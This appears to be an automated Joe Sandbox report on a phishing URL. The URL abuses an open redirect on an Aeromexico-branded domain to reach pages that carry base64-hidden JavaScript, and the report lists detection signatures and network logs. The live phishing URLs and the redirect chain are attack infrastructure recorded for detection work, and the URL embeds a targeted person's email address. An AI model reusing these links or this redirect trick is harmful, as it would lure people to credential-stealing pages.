Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==

Overview

General Information

Sample URL:https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==
Analysis ID:1493358
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
Detected use of open redirect vulnerability
HTML page contains suspicious base64 encoded javascript
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
No HTML title found

Classification

  • System is w10x64
  • chrome.exe (PID: 352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2028,i,7290064601544366659,9652853675745150705,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_646JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_646, type: DROPPED
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Proxy from: aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/gcgaming/423184/ to https://foxloc.com.br/g63a/gcgaming/423184/
    Source: https://eff.contempi.su/DJuy2C6F/#Ebkamphuis@gcgaming.comHTTP Parser: Base64 decoded: <script>
    Source: https://eff.contempi.su/DJuy2C6F/#Ebkamphuis@gcgaming.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: HTML title missing
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: HTML title missing
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: HTML title missing
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: HTML title missing
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: <input type="password" .../> found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: <input type="password" .../> found
    Source: https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.htmlHTTP Parser: No favicon
    Source: https://www.amazon.ae/b/?_encoding=UTF8&node=30082653031&pd_rd_w=PvPUB&content-id=amzn1.sym.e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_p=e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_r=1GXSAVZ7MBDVTNT0VYNB&pd_rd_wg=BEf2n&pd_rd_r=10ff52dc-63aa-4adb-9a14-21011bc538fc&ref_=pd_hp_d_hero_unk&discounts-widget=%2522%257B%255C%2522state%255C%2522%253A%257B%255C%2522refinementFilters%255C%2522%253A%257B%257D%257D%252C%255C%2522version%255C%2522%253A1%257D%2522HTTP Parser: No favicon
    Source: https://www.amazon.ae/b/?_encoding=UTF8&node=30082653031&pd_rd_w=PvPUB&content-id=amzn1.sym.e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_p=e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_r=1GXSAVZ7MBDVTNT0VYNB&pd_rd_wg=BEf2n&pd_rd_r=10ff52dc-63aa-4adb-9a14-21011bc538fc&ref_=pd_hp_d_hero_unk&discounts-widget=%2522%257B%255C%2522state%255C%2522%253A%257B%255C%2522refinementFilters%255C%2522%253A%257B%257D%257D%252C%255C%2522version%255C%2522%253A1%257D%2522HTTP Parser: No favicon
    Source: https://www.amazon.ae/b/?_encoding=UTF8&node=30082653031&pd_rd_w=PvPUB&content-id=amzn1.sym.e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_p=e610e695-61bf-4b64-9f77-57dba86777d6&pf_rd_r=1GXSAVZ7MBDVTNT0VYNB&pd_rd_wg=BEf2n&pd_rd_r=10ff52dc-63aa-4adb-9a14-21011bc538fc&ref_=pd_hp_d_hero_unk&discounts-widget=%2522%257B%255C%2522state%255C%2522%253A%257B%255C%2522refinementFilters%255C%2522%253A%257B%257D%257D%252C%255C%2522version%255C%2522%253A1%257D%2522HTTP Parser: No favicon
    Source: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_langHTTP Parser: No favicon
    Source: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_langHTTP Parser: No favicon
    Source: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_langHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=0101ea4ef5389a5c57e24d430a268c4430b4509d0a53852f76d6a2872cad8dfecd06&old_oo=0&ts=1723729095791&s=ASS7k3cmwUH4OC1O9BSIEM7rXLw16XAgRkpA7IxVAtpk&gdpr_consent=&gdpr_consent_avl=&cb=1723729095791&dcc=tHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=n-xr-HMT_n-id-HMT_n-audex_n-weborama-pca_n-eq-HMT3_n-ix-HMT_bk_n-y-HMT_n-cx-HMT_n-telaria_n-dm2-HMT_fw_n-fo-HMT_n-kr-new_n-bsw-hmt_n-st-HMT1_n-rb-HMT3_n-fw-HMT1_adb_mp_af_n-sk_n-mediarithmics_g_kr_n-lm-HMT3_ox_index_n-tl-HMT_n-semasio-ecm_n-kg-HMT_n-gg-HMT2_an_n-pm-HMT_n-g-hmt_nsln_fbca_n-ym-HMT_n-sc_pm_n-ox-hmt&fv=1.0&ex-pl-fbca=N3EFGF3vTTeRiAfcQ-KSyQ&a=cm&ex-pl-n-kr-new=ijvxdYgbTRe11sFt-i5GpQ&dmt=1&gdpr_consent=&ex-pl-n-g-hmt=ulDk4Qz9S9q6Ri79q3LtYA&ep=ttam_T219Ay-cPciHbT10oYeEN8M0rrnJ_N93j0wtIiyhRo_tZ9cY4mnyPKb1X63DCavMEQrd17XI7jGXJOd_J_TgJEN-hnUrpFBHD94hK6cBJX02tssL2TrFQoEM8QDYhk_lwBFeGVB2BcbDMFFjYuW82FE3kgQkMWKQNH0T489bIL_HD8HxBABVYtThQb354qNsEJ3dbRzFFCq2d_KzbcvV9b4UXX-T4hGQHAFe73J3acXUJge4oSW0mHX8qflEkNCvhXnGztXS2nyVETBKCaiIrLKkbD_UPc6KDfeOtChyf7ZcSZP3KxVam4W2vznMRxPbhsyuyi10szEWG49kOjZRSRQbuNP0hPR25C62Lcx9GKeXASzgrsjao7_TpR-TMK50PZDd3JwFStg83jo0KGSE9xlY3VrxdGeqL_ELPvHLrXPWy984gN_u7So5epb00YkgzUALXiD_QQC6QIFy6SQsfWbXJs3MeqEvc-juSN4mcKGfc8q2YMQGAyoTk2Lt61b...HTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=0101ea4ef5389a5c57e24d430a268c4430b4509d0a53852f76d6a2872cad8dfecd06&old_oo=0&ts=1723729109248&s=Af5D1pdzSpZN3vzBIs8y647oIb11-5LpyOOnjozr1HGA&gdpr_consent=&gdpr_consent_avl=&cb=1723729109248HTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=n-audex_n-weborama-pca_mp_af_n-sk_n-mediarithmics_g_bk_ox_index_n-semasio-ecm_n-telaria_an_fw_nsln_fbca_n-sc_pm_adb&fv=1.0&ex-pl-fbca=N3EFGF3vTTeRiAfcQ-KSyQ&a=cm&dmt=1&gdpr_consent=&ep=t0lYLix41FTrK7ny4hZcFrdz_z9ejwrwwMmktH_0a_Bk3ob6nVfH3G-L8rXTeABewck_PZfX9PGxlIiwFiwtO2RGObcU6pYaFqfxC1iCDxIHTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No favicon
    Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
    Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
    Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
    Source: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=fw_mp_n-gg-HMT2_n-cx-HMT_nsln_n-telaria&fv=1.0&a=cm&dmt=1&gdpr_consent=&ep=t0lYLix41FTrK7ny4hZcFrdz_z9ejwrwwMmktH_0a_Do5qRl2uKNhNxTiCz3PpSYnP_CapO1mDqWOYgQjwoLJ4Jn68-GUedN6ce8XMwI9EZ8lyAl-Xbocpo8xn1lMBpLyFSj9nLkg3jQhxI3zBmkZIiqQbmveUzyVIGEOHFvUtwHTTP Parser: No favicon
    Source: https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=0101ea4ef5389a5c57e24d430a268c4430b4509d0a53852f76d6a2872cad8dfecd06&old_oo=0&ts=1723729133508&s=AWtnXHxgPvSel3Cxkam4LAwyREJfE1CojJAQxYSNLGF4&gdpr_consent=&gdpr_consent_avl=&cb=1723729133508HTTP Parser: No favicon
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="author".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2Fyour-orders%2Forders%3Fref_%3Dnav_orders_first&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=amzn_retail_yourorders_ae&openid.mode=checkid_setup&language=en_AE&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
    Source: Binary string: c.pdb_observe(g)}function d(){c&&g&&(c.pdb_unobserve(g),g=null)}var e=k,c=null,g=null,n=m.init(l);this.setAsin=function(e,l){l=l||{};d();c=f.get(e);a(c,l);c.loading&&b(function(b){a(b,l)});return c};this.clear=function(){d();c={};m.update(n,c)}}});g.P&&n.when("jQuery","afterLoad").register("gw-resource-logger",function(f){return{instrumentResources:function(m){var k;k=!1;if(f.isArray(m)&&!f.isEmptyObject(m)){k=!0;for(var h=0;h<m.length;h++){var l=m[h];if("id"in l&&"regex"in l&&"initiator"in l){if(!("string"=== source: chromecache_710.2.dr, chromecache_416.2.dr
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: aeromexico.playable.video to https://foxloc.com.br/g63a/gcgaming/423184/
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
